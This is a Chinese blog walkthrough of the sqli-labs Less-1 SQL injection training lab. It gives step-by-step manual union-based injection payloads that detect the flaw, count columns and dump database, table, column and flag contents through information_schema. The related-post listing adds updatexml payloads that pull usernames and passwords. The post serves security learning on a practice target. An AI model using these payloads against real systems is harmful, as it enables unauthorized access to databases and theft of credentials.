在线sqli-labs 通关大全 Less-1

最新推荐文章于 2024-03-19 20:01:13 发布
最新推荐文章于 2024-03-19 20:01:13 发布
阅读量1.3k 收藏 3
点赞数 1
分类专栏: 安全 ctf sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44985415/article/details/108257029
版权
安全 同时被 3 个专栏收录
12 篇文章 1 订阅
订阅专栏
ctf
5 篇文章 0 订阅
订阅专栏
sql
4 篇文章 0 订阅
订阅专栏

sqli-labs (1)

sqli-labs实验前:

本人因在sqli-labs搭建过程中遇到大量问题,百度后依旧无果,所以现决定在在线sqli-labs平台进行试验。
sqli-labs在线平台: http://43.247.91.228:84/

在这里插入图片描述
在线平台sqli-labs Page-1 点击Less-1可直接进行试验
在这里插入图片描述

一.知识点

1.FireFox插件HackBar使用
2.字符型注入:注意单引号闭合
3.sqlmap这里暂时不使用,想了解的可以自己尝试,刚开始手工注入扎扎实实打基础较好。
4.字符型注入判断

(1)判断注入

?id=1' and 1=1 --+ 返回正确
?id=1' and 1=2 --+ 返回错误

(2)猜字段

?id=1' order by 2 --+ 返回正确
?id=1' order by 3 --+ 返回错误 

得出字段数为 2

下面为测试空格字符代替情况 (可跳过)

?id=1' order by 2 -- - 返回正确
?id=1' order by 2 -- / 返回正确

(3)爆数据库名

?id=1' and 1=2 union select 1,database()--+

得到数据库sqli

(4)爆表名

?id=1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'--+

(5)爆列名

?id=1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'--+

(6)爆字段内容(flag)

?id=1' and 1=2 union select 1,group_concat(flag) from sqli.flag--+

二.题解

注:以下解题步骤大多以图片显示不再做过多解释

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
字段为3的时候显示正常,字段为4时显示错误,所以最终字段为3
在这里插入图片描述
数据库名为security
在这里插入图片描述
因为第二步爆出有3个字段,所以select后面要跟3个字段,下面这张图片为跟了两个字段时的情形会显示错误
在这里插入图片描述
爆出的表名有四个:emails,referers,uagents,users
在这里插入图片描述
上面四个表名中uagents,users两个表名最可疑,经过尝试在users表中得到了payload如下图
在这里插入图片描述
总结:字符型注入可以按照以上六步进行手工尝试最后得到payload

推荐:最后给大家推荐几个sql或者其他漏洞学习方面不错的网站
sql整数型/字符型注入: https://www.cnblogs.com/threesoil/p/12431496.html

ctf wiki: https://ctf-wiki.github.io/ctf-wiki/web/sqli-zh/

狼组知识库web方面: https://wiki.wgpsec.org/knowledge/web/

ctfhub sql注入wp: https://www.cnblogs.com/0yst3r-2046/p/12469632.html(最后这个是来自ctfhub学习中偶然看到的一位不认识的大佬,ta的ctf wp都挺详细的大家也可以多做学习)

请叫我初学者
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
Sqli-labs之Less-24(二次注入)
m0_46315342的博客
06-04 522
                                          &nbs...
线上黑客攻防 SQL注入漏洞靶场SQLi-Labs通关教程
安全龙网络安全攻防实验室
10-25 4357
SQLi-Labs是一个专业的SQL注入练习平台,该平台包含了以下在测试场景中常见的注入类型;环境共有65个SQL注入漏洞。其中9个环境,可通过本教程,按步骤实验,复现学习该sql注入漏洞; 本攻防实验地址 https://www.anquanlong.com/lab_introduce?lab_id=3 实验目录 0x1 sqli-labs环境介绍 0x2 sql注入基础知识 Less-1错...
sqli-labs训练平台靶场详解!!!!
最新发布
ytdd66的博客
03-19 1474
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
SQL-Labs从搭建到闯关(SQL注入天书)
Kevin's Blog
02-22 4538
一、介绍   sql-labs是一个学习sql注入的平台 二、环境搭建 GitHub项目地址:https://github.com/Audi-1/sqli-labs 》》启动phpstudy 》》将sql-labs解压到站点目录 》》进入到sqli-labs靶机站点,点击重置数据库即可在mysql中创建了数据库 》》进入到关卡1 三、注入类型 3.1 Less-1 字符型注入,基于错误的GET单引号 3.1.1 判断是否存在注入点 》》输入?id=1 显示出了数据库中第一行的数据 》》输入单引号
在线sqli-labs 通关大全 Less-2
qq_44985415的博客
08-29 473
sqli-labs (2) 励志语录 青年是学习智慧的时期,中年是付诸实践的时期。——卢梭 1.知识点 sql注入常见参数 user():当前数据库用户 database():当前数据库名 concat():联合数据,用于联合两条数据结果。如 concat(username,0x3a,password) group_concat():和 concat() 类似,如 group_concat(DISTINCT+user,0x3a,password),用于把多条数据一次注入出来 concat_ws():用
sqli-labs第一关
weixin_69147946的博客
11-11 406
sqli-labs靶机笔记
在线sqli-labs 通关大全 Less-3
qq_44985415的博客
08-31 400
sqli-labs (2) 励志语录 学习知识要善于思考,思考,再思考。——爱因斯坦 1.知识点 (1)字符型:’) (2)sqlmap使用 2.题解 注:因题目简单所以下解题步骤大多以图片显示不再做过多解释 方法一:手工注入 图一 图二 注意看图二图三有什么不同,图二是第三关的,而图三是第一关的解题步骤,本关sql注入在单引号的条件下又多了一个右括号,因此想绕过需要把右括号也加上 图三 右括号加上之后在进行实验发现返回结果正常 图四 猜字段 图五 用下面这条语句爆库名,将id=1换成了id=-1,因
web靶场 --- sqli-labs
L0g1c的博客
07-06 1243
SQL注入的本质是用户输入的数据被当作代码执行mysql语法:查库: 查表:查列:查字段: 查看是否有注入 确实存在SQL注入漏洞查看有多少列先使用 再使用 所以得到users表有3列查看哪些数据可以回显[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-drLNqXTv-1657118499948)(https://raw.githubusercontent.com/Ckingt-k/photos/main/image-20220706192047368.png)]查看当前数
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqlilabs通关()
Forrest_bear的博客
05-24 937
就像以下代码一样:隔离空格。
MYSQL基于SQL-LABS Less24二次注入详解
AaronLuo
09-07 777
原理 二次注入是指攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入 二次注入思路 通过构造数据的形式,在浏览器或者其他软件中提价HTTP数据报文请求到服...
sqli_libs通关教程
qq_48904485的博客
03-22 4900
less-1 单引号联合注入 1、判断是字符型还是数字型 Id=2-1 与 id=2 结果相同就是字符型 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xnvwRRTo-1647921807254)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-20211023110308434.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bmKZuH51-16479
sqli-labs闯关1-1
Darklord.W
06-30 410
sqli-labs闯关1-1 在线练习网址http://43.247.91.228:84/ 首先,进入sqli-labs 1-1 输入http://43.247.91.228:84/Less-1/?id=1 输入http://43.247.91.228:84/Less-1/?id=1’ 用and1=1和and1=2,结果显示它为字符型注入 http://43.247.91.228:84/Less-...
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 2万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
SQL注入之sqli-labs环境搭建
weixin_69054284的博客
09-20 2044
往往很多新手在刚学习SQL注入的时候,都需要拥有一个能SQL注入的网站,需要有的。直接去互联网上找的话对新手未免有点太难了,因此:我们一般都是在本地搭建一个能SQL注入测试的网站,那样我们学习SQL注入就容易多了。Sqli-labs是一个印度程序员写的,用来学习的一个游戏教程。
sqli-labs通关1-5
09-03
sqli-labs是一个SQL注入学习平台,通过完成一系列的关卡来学习和实践SQL注入漏洞的利用方法。根据引用的描述,首先需要在浏览器中打开"http://127.0.0.1/sqli-labs/",访问平台的首页。然后点击"Setup/reset Database"按钮以创建数据库,创建表并填充数据。 完成了上述设置后,可以开始挑战关卡。 sqli-labs通关1关:根据引用提供的内容,可以在URL中加入"?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(password,username) from users),0x5c),1))"来进行注入。这样就能够获取到users表中的密码和用户名的组合。 sqli-labs通关2关:根据引用提供的内容,可以在账户密码后面加入"1',updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1))#"来进行注入。这样就能够获取到users表中的用户名和密码的组合。 sqli-labs通关3关:通关3关的方法没有在提供的引用中找到相关信息。 sqli-labs通关4关:根据引用提供的内容,可以在URL中加入"?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(password,username) from users),0x5c),1))"来进行注入。这样就能够获取到users表中的密码和用户名的组合。 sqli-labs通关5关:通关5关的方法没有在提供的引用中找到相关信息。 请注意,为了安全起见,在进行实际操作时,请确保仅在合法和授权的环境中进行,并遵守法律和道德规范。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [详细sqli-labs(1-65)通关讲解](https://blog.csdn.net/dreamthe/article/details/123795302)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [Sqli-labs通关全解---关于Sqli-lab--1](https://blog.csdn.net/cyynid/article/details/128629421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值